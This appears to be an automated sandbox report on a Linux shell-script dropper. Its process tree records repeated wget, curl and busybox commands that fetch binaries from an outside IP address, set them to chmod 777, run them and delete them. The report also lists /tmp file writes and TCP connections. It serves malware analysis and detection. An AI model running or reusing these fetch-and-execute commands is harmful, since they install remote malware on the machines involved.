| N/A | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | N/A |
| N/A | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | N/A |
| N/A | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | N/A |
| N/A | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | N/A |
| N/A | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | N/A |
| N/A | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | N/A |
| N/A | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | N/A |
| N/A | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | N/A |
| N/A | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | N/A |
| N/A | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | N/A |
| N/A | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | N/A |
| N/A | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | N/A |
| N/A | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | N/A |
| N/A | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | N/A |
| N/A | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | N/A |
| N/A | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | N/A |
| N/A | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | N/A |
| N/A | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /usr/bin/curl | N/A |
Processes
/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/chmod
[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/rm
[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/wget
[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/chmod
[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J
[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/rm
[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/wget
[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/chmod
[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O
[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/rm
[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/wget
[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/chmod
[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB
[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/rm
[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/wget
[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/chmod
[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O
[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/rm
[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/wget
[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/chmod
[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz
[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/rm
[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/wget
[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/chmod
[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE
[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/rm
[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/wget
[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/chmod
[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx
[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/rm
[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/wget
[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/chmod
[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4
[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/rm
[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/wget
[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/chmod
[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC
[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/rm
[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/wget
[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/chmod
[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ
[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/rm
[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/chmod
[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q
[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/rm
[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/wget
[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/chmod
[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0
[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/rm
[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/wget
[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/chmod
[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0
[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/rm
[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/wget
[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/chmod
[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC
[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/rm
[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/wget
[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/chmod
[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ
[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/rm
[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/chmod
[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q
[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/rm
[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/wget
[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/chmod
[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0
[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/rm
[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/wget
[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/chmod
[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0
[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/rm
[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/wget
[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/chmod
[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/rm
[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/wget
[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/chmod
[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J
[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/rm
[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/wget
[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/chmod
[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O
[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/rm
[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/wget
[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/chmod
[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB
[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/rm
[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/wget
[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/chmod
[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4
[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/rm
[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/wget
[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/chmod
[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O
[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/rm
[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/wget
[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/chmod
[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz
[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/rm
[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/wget
[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/chmod
[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE
[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/rm
[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/wget
[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/chmod
[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx
[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/rm
[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
